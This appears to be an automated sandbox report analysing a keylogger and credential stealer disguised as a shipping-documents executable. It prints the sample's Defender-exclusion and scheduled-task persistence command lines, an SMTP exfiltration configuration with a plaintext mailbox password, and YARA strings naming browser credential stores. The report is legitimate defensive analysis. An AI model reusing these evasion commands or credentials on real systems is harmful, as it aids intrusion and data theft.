Edit tour

Windows Analysis Report
Copy shipping docs PO EV1786 LY ECO PAK EV1.exe

Overview

General Information

Sample name:	Copy shipping docs PO EV1786 LY ECO PAK EV1.exe
Analysis ID:	1586738
MD5:	0368a9aa7437bac59b4253abd5f99818
SHA1:	f98bd818ee1996762b9f8b79f52db921009d2c03
SHA256:	c024729558cdf11515cc4024d0f3118d8313a86c68d48846376c55b8ec97c0e4
Tags:	exeSnakeKeyloggeruser-James_inthe_box
Infos:

Detection

PureLog Stealer, Snake Keylogger, VIP Keylogger

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Antivirus detection for dropped file

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Scheduled temp file as task from temp location

Suricata IDS alerts for network traffic

Yara detected AntiVM3

Yara detected PureLog Stealer

Yara detected Snake Keylogger

Yara detected Telegram RAT

Yara detected VIP Keylogger

AI detected suspicious sample

Adds a directory exclusion to Windows Defender

Loading BitLocker PowerShell Module

Machine Learning detection for dropped file

Machine Learning detection for sample

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Tries to detect the country of the analysis system (by using the IP)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Uses schtasks.exe or at.exe to add and modify task schedules

Uses the Telegram API (likely for C&C communication)

Yara detected Generic Downloader

Abnormal high CPU Usage

Allocates memory with a write watch (potentially for evading sandboxes)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates processes with suspicious names

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Powershell Defender Exclusion

Sigma detected: Suspicious Outbound SMTP Connections

Sigma detected: Suspicious Schtasks From Env Var Folder

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses SMTP (mail sending)

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

Copy shipping docs PO EV1786 LY ECO PAK EV1.exe (PID: 6300 cmdline: "C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe" MD5: 0368A9AA7437BAC59B4253ABD5F99818)

powershell.exe (PID: 6640 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\SNgtfGzYQ.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 6204 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WmiPrvSE.exe (PID: 5612 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)

schtasks.exe (PID: 6660 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SNgtfGzYQ" /XML "C:\Users\user\AppData\Local\Temp\tmpE1BD.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 6556 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

SNgtfGzYQ.exe (PID: 5560 cmdline: C:\Users\user\AppData\Roaming\SNgtfGzYQ.exe MD5: 0368A9AA7437BAC59B4253ABD5F99818)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
404 Keylogger, Snake Keylogger	Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.	No Attribution	https://any.run/cybersecurity-blog/analyzing-snake-keylogger/ https://any.run/cybersecurity-blog/reverse-engineering-snake-keylogger/ https://blog.netlab.360.com/purecrypter https://blog.nviso.eu/2022/04/06/analyzing-a-multilayer-maldoc-a-beginners-guide/ https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord	https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: VIP Keylogger

{"Exfil Mode": "SMTP", "Email ID": "director@igakuin.com", "Password": "wVCMFq@2wVCMFq@2", "Host": "us2.smtp.mailhostbox.com", "Port": "587"}

Threatname: Snake Keylogger

{"Exfil Mode": "SMTP", "Username": "director@igakuin.com", "Password": "wVCMFq@2wVCMFq@2", "Host": "us2.smtp.mailhostbox.com", "Port": "587", "Version": "4.4"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000008.00000002.2125384122.0000000007850000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000008.00000002.2122802743.0000000004379000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000000.00000002.4541033239.000000000A040000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.4541033239.000000000A040000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
00000000.00000002.4541033239.000000000A040000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000000.00000002.4541033239.000000000A040000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000000.00000002.4541033239.000000000A040000.00000004.08000000.00040000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2e009:$a1: get_encryptedPassword 0x2e326:$a2: get_encryptedUsername 0x2de19:$a3: get_timePasswordChanged 0x2df22:$a4: get_passwordField 0x2e01f:$a5: set_encryptedPassword 0x2f6ba:$a7: get_logins 0x2f61d:$a10: KeyLoggerEventArgs 0x2f282:$a11: KeyLoggerEventArgsEventHandler
00000000.00000002.4541033239.000000000A040000.00000004.08000000.00040000.00000000.sdmp	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3bd4e:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3b3f1:$a3: \Google\Chrome\User Data\Default\Login Data 0x3b64e:$a4: \Orbitum\User Data\Default\Login Data 0x3c02d:$a5: \Kometa\User Data\Default\Login Data
00000000.00000002.4541033239.000000000A040000.00000004.08000000.00040000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2ec2c:$s1: UnHook 0x2ec33:$s2: SetHook 0x2ec3b:$s3: CallNextHook 0x2ec48:$s4: _hook
00000000.00000002.4530259452.0000000002451000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000000.00000002.4534434481.00000000036E3000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.4534434481.00000000036E3000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000000.00000002.4534434481.00000000036E3000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000000.00000002.4534434481.00000000036E3000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2eee1:$a1: get_encryptedPassword 0x2f1fe:$a2: get_encryptedUsername 0x2ecf1:$a3: get_timePasswordChanged 0x2edfa:$a4: get_passwordField 0x2eef7:$a5: set_encryptedPassword 0x30592:$a7: get_logins 0x304f5:$a10: KeyLoggerEventArgs 0x3015a:$a11: KeyLoggerEventArgsEventHandler
00000000.00000002.4534434481.0000000003608000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.4534434481.0000000003608000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000000.00000002.4534434481.0000000003608000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000000.00000002.4534434481.0000000003608000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2ead1:$a1: get_encryptedPassword 0x2edee:$a2: get_encryptedUsername 0x2e8e1:$a3: get_timePasswordChanged 0x2e9ea:$a4: get_passwordField 0x2eae7:$a5: set_encryptedPassword 0x30182:$a7: get_logins 0x300e5:$a10: KeyLoggerEventArgs 0x2fd4a:$a11: KeyLoggerEventArgsEventHandler
00000008.00000002.2122802743.00000000043B8000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000000.00000002.4530259452.00000000024CF000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.4530259452.00000000024CF000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000000.00000002.4530259452.00000000024CF000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: Copy shipping docs PO EV1786 LY ECO PAK EV1.exe PID: 6300	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: Copy shipping docs PO EV1786 LY ECO PAK EV1.exe PID: 6300	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: Copy shipping docs PO EV1786 LY ECO PAK EV1.exe PID: 6300	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
Process Memory Space: Copy shipping docs PO EV1786 LY ECO PAK EV1.exe PID: 6300	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: Copy shipping docs PO EV1786 LY ECO PAK EV1.exe PID: 6300	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3d9c2:$a1: get_encryptedPassword 0x4cbb9:$a1: get_encryptedPassword 0x7f69f:$a1: get_encryptedPassword 0x3dcd5:$a2: get_encryptedUsername 0x4cecc:$a2: get_encryptedUsername 0x7f9b2:$a2: get_encryptedUsername 0x3d7dc:$a3: get_timePasswordChanged 0x4c9d3:$a3: get_timePasswordChanged 0x7f4b9:$a3: get_timePasswordChanged 0x3d8e5:$a4: get_passwordField 0x4cadc:$a4: get_passwordField 0x7f5c2:$a4: get_passwordField 0x3d9d8:$a5: set_encryptedPassword 0x4cbcf:$a5: set_encryptedPassword 0x7f6b5:$a5: set_encryptedPassword 0x3fe8a:$a7: get_logins 0x4f081:$a7: get_logins 0x81b67:$a7: get_logins 0x3fded:$a10: KeyLoggerEventArgs 0x4efe4:$a10: KeyLoggerEventArgs 0x81aca:$a10: KeyLoggerEventArgs
Process Memory Space: SNgtfGzYQ.exe PID: 5560	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Click to see the 23 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
8.2.SNgtfGzYQ.exe.7850000.8.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
8.2.SNgtfGzYQ.exe.7850000.8.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
8.2.SNgtfGzYQ.exe.43988d8.3.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
8.2.SNgtfGzYQ.exe.43b88f8.4.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
8.2.SNgtfGzYQ.exe.43988d8.3.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.2.Copy shipping docs PO EV1786 LY ECO PAK EV1.exe.a040000.3.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.Copy shipping docs PO EV1786 LY ECO PAK EV1.exe.a040000.3.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0.2.Copy shipping docs PO EV1786 LY ECO PAK EV1.exe.a040000.3.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.Copy shipping docs PO EV1786 LY ECO PAK EV1.exe.a040000.3.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2c209:$a1: get_encryptedPassword 0x2c526:$a2: get_encryptedUsername 0x2c019:$a3: get_timePasswordChanged 0x2c122:$a4: get_passwordField 0x2c21f:$a5: set_encryptedPassword 0x2d8ba:$a7: get_logins 0x2d81d:$a10: KeyLoggerEventArgs 0x2d482:$a11: KeyLoggerEventArgsEventHandler
0.2.Copy shipping docs PO EV1786 LY ECO PAK EV1.exe.a040000.3.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x39f4e:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x395f1:$a3: \Google\Chrome\User Data\Default\Login Data 0x3984e:$a4: \Orbitum\User Data\Default\Login Data 0x3a22d:$a5: \Kometa\User Data\Default\Login Data
0.2.Copy shipping docs PO EV1786 LY ECO PAK EV1.exe.a040000.3.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2ce2c:$s1: UnHook 0x2ce33:$s2: SetHook 0x2ce3b:$s3: CallNextHook 0x2ce48:$s4: _hook
0.2.Copy shipping docs PO EV1786 LY ECO PAK EV1.exe.a040000.3.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.Copy shipping docs PO EV1786 LY ECO PAK EV1.exe.a040000.3.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.2.Copy shipping docs PO EV1786 LY ECO PAK EV1.exe.a040000.3.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0.2.Copy shipping docs PO EV1786 LY ECO PAK EV1.exe.a040000.3.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.Copy shipping docs PO EV1786 LY ECO PAK EV1.exe.a040000.3.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2e009:$a1: get_encryptedPassword 0x2e326:$a2: get_encryptedUsername 0x2de19:$a3: get_timePasswordChanged 0x2df22:$a4: get_passwordField 0x2e01f:$a5: set_encryptedPassword 0x2f6ba:$a7: get_logins 0x2f61d:$a10: KeyLoggerEventArgs 0x2f282:$a11: KeyLoggerEventArgsEventHandler
0.2.Copy shipping docs PO EV1786 LY ECO PAK EV1.exe.a040000.3.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3bd4e:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3b3f1:$a3: \Google\Chrome\User Data\Default\Login Data 0x3b64e:$a4: \Orbitum\User Data\Default\Login Data 0x3c02d:$a5: \Kometa\User Data\Default\Login Data
0.2.Copy shipping docs PO EV1786 LY ECO PAK EV1.exe.a040000.3.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2ec2c:$s1: UnHook 0x2ec33:$s2: SetHook 0x2ec3b:$s3: CallNextHook 0x2ec48:$s4: _hook
0.2.Copy shipping docs PO EV1786 LY ECO PAK EV1.exe.3608ac8.0.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.Copy shipping docs PO EV1786 LY ECO PAK EV1.exe.3608ac8.0.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.2.Copy shipping docs PO EV1786 LY ECO PAK EV1.exe.3608ac8.0.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0.2.Copy shipping docs PO EV1786 LY ECO PAK EV1.exe.3608ac8.0.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.Copy shipping docs PO EV1786 LY ECO PAK EV1.exe.3608ac8.0.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2e009:$a1: get_encryptedPassword 0x2e326:$a2: get_encryptedUsername 0x2de19:$a3: get_timePasswordChanged 0x2df22:$a4: get_passwordField 0x2e01f:$a5: set_encryptedPassword 0x2f6ba:$a7: get_logins 0x2f61d:$a10: KeyLoggerEventArgs 0x2f282:$a11: KeyLoggerEventArgsEventHandler
0.2.Copy shipping docs PO EV1786 LY ECO PAK EV1.exe.3608ac8.0.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3bd4e:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3b3f1:$a3: \Google\Chrome\User Data\Default\Login Data 0x3b64e:$a4: \Orbitum\User Data\Default\Login Data 0x3c02d:$a5: \Kometa\User Data\Default\Login Data
0.2.Copy shipping docs PO EV1786 LY ECO PAK EV1.exe.3608ac8.0.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2ec2c:$s1: UnHook 0x2ec33:$s2: SetHook 0x2ec3b:$s3: CallNextHook 0x2ec48:$s4: _hook
0.2.Copy shipping docs PO EV1786 LY ECO PAK EV1.exe.36e3ed8.1.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.Copy shipping docs PO EV1786 LY ECO PAK EV1.exe.36e3ed8.1.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0.2.Copy shipping docs PO EV1786 LY ECO PAK EV1.exe.36e3ed8.1.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.Copy shipping docs PO EV1786 LY ECO PAK EV1.exe.36e3ed8.1.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2c209:$a1: get_encryptedPassword 0x2c526:$a2: get_encryptedUsername 0x2c019:$a3: get_timePasswordChanged 0x2c122:$a4: get_passwordField 0x2c21f:$a5: set_encryptedPassword 0x2d8ba:$a7: get_logins 0x2d81d:$a10: KeyLoggerEventArgs 0x2d482:$a11: KeyLoggerEventArgsEventHandler
0.2.Copy shipping docs PO EV1786 LY ECO PAK EV1.exe.36e3ed8.1.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x39f4e:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x395f1:$a3: \Google\Chrome\User Data\Default\Login Data 0x3984e:$a4: \Orbitum\User Data\Default\Login Data 0x3a22d:$a5: \Kometa\User Data\Default\Login Data
0.2.Copy shipping docs PO EV1786 LY ECO PAK EV1.exe.36e3ed8.1.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2ce2c:$s1: UnHook 0x2ce33:$s2: SetHook 0x2ce3b:$s3: CallNextHook 0x2ce48:$s4: _hook
0.2.Copy shipping docs PO EV1786 LY ECO PAK EV1.exe.3608ac8.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.Copy shipping docs PO EV1786 LY ECO PAK EV1.exe.3608ac8.0.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0.2.Copy shipping docs PO EV1786 LY ECO PAK EV1.exe.3608ac8.0.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.Copy shipping docs PO EV1786 LY ECO PAK EV1.exe.36e3ed8.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.Copy shipping docs PO EV1786 LY ECO PAK EV1.exe.36e3ed8.1.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.2.Copy shipping docs PO EV1786 LY ECO PAK EV1.exe.36e3ed8.1.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0.2.Copy shipping docs PO EV1786 LY ECO PAK EV1.exe.36e3ed8.1.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.Copy shipping docs PO EV1786 LY ECO PAK EV1.exe.3608ac8.0.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2c209:$a1: get_encryptedPassword 0x2c526:$a2: get_encryptedUsername 0x2c019:$a3: get_timePasswordChanged 0x2c122:$a4: get_passwordField 0x2c21f:$a5: set_encryptedPassword 0x2d8ba:$a7: get_logins 0x2d81d:$a10: KeyLoggerEventArgs 0x2d482:$a11: KeyLoggerEventArgsEventHandler
0.2.Copy shipping docs PO EV1786 LY ECO PAK EV1.exe.36e3ed8.1.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2e009:$a1: get_encryptedPassword 0x2e326:$a2: get_encryptedUsername 0x2de19:$a3: get_timePasswordChanged 0x2df22:$a4: get_passwordField 0x2e01f:$a5: set_encryptedPassword 0x2f6ba:$a7: get_logins 0x2f61d:$a10: KeyLoggerEventArgs 0x2f282:$a11: KeyLoggerEventArgsEventHandler
0.2.Copy shipping docs PO EV1786 LY ECO PAK EV1.exe.3608ac8.0.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x39f4e:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x395f1:$a3: \Google\Chrome\User Data\Default\Login Data 0x3984e:$a4: \Orbitum\User Data\Default\Login Data 0x3a22d:$a5: \Kometa\User Data\Default\Login Data
0.2.Copy shipping docs PO EV1786 LY ECO PAK EV1.exe.36e3ed8.1.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3bd4e:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3b3f1:$a3: \Google\Chrome\User Data\Default\Login Data 0x3b64e:$a4: \Orbitum\User Data\Default\Login Data 0x3c02d:$a5: \Kometa\User Data\Default\Login Data
0.2.Copy shipping docs PO EV1786 LY ECO PAK EV1.exe.3608ac8.0.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2ce2c:$s1: UnHook 0x2ce33:$s2: SetHook 0x2ce3b:$s3: CallNextHook 0x2ce48:$s4: _hook
0.2.Copy shipping docs PO EV1786 LY ECO PAK EV1.exe.36e3ed8.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2ec2c:$s1: UnHook 0x2ec33:$s2: SetHook 0x2ec3b:$s3: CallNextHook 0x2ec48:$s4: _hook
8.2.SNgtfGzYQ.exe.43b88f8.4.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
Click to see the 40 entries

Sigma Signatures

System Summary

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\SNgtfGzYQ.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\SNgtfGzYQ.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe", ParentImage: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe, ParentProcessId: 6300, ParentProcessName: Copy shipping docs PO EV1786 LY ECO PAK EV1.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\SNgtfGzYQ.exe", ProcessId: 6640, ProcessName: powershell.exe

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Suspicious Outbound SMTP Connections

Source: Network Connection

Author: frack113: Data: DestinationIp: 208.91.199.223, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe, Initiated: true, ProcessId: 6300, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49766

Sigma detected: Suspicious Schtasks From Env Var Folder

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SNgtfGzYQ" /XML "C:\Users\user\AppData\Local\Temp\tmpE1BD.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SNgtfGzYQ" /XML "C:\Users\user\AppData\Local\Temp\tmpE1BD.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe", ParentImage: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe, ParentProcessId: 6300, ParentProcessName: Copy shipping docs PO EV1786 LY ECO PAK EV1.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SNgtfGzYQ" /XML "C:\Users\user\AppData\Local\Temp\tmpE1BD.tmp", ProcessId: 6660, ProcessName: schtasks.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\SNgtfGzYQ.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\SNgtfGzYQ.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe", ParentImage: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe, ParentProcessId: 6300, ParentProcessName: Copy shipping docs PO EV1786 LY ECO PAK EV1.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\SNgtfGzYQ.exe", ProcessId: 6640, ProcessName: powershell.exe

Persistence and Installation Behavior

Sigma detected: Scheduled temp file as task from temp location

Source: Process started

Author: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SNgtfGzYQ" /XML "C:\Users\user\AppData\Local\Temp\tmpE1BD.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SNgtfGzYQ" /XML "C:\Users\user\AppData\Local\Temp\tmpE1BD.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe", ParentImage: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe, ParentProcessId: 6300, ParentProcessName: Copy shipping docs PO EV1786 LY ECO PAK EV1.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SNgtfGzYQ" /XML "C:\Users\user\AppData\Local\Temp\tmpE1BD.tmp", ProcessId: 6660, ProcessName: schtasks.exe

Suricata Signatures

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-09T15:08:05.775992+0100	2803305	3	Unknown Traffic	192.168.2.5	49709	104.21.80.1	443	TCP
2025-01-09T15:08:07.260244+0100	2803305	3	Unknown Traffic	192.168.2.5	49712	104.21.80.1	443	TCP
2025-01-09T15:08:11.224332+0100	2803305	3	Unknown Traffic	192.168.2.5	49719	104.21.80.1	443	TCP

ETPRO MALWARE Common Downloader Header Pattern UH

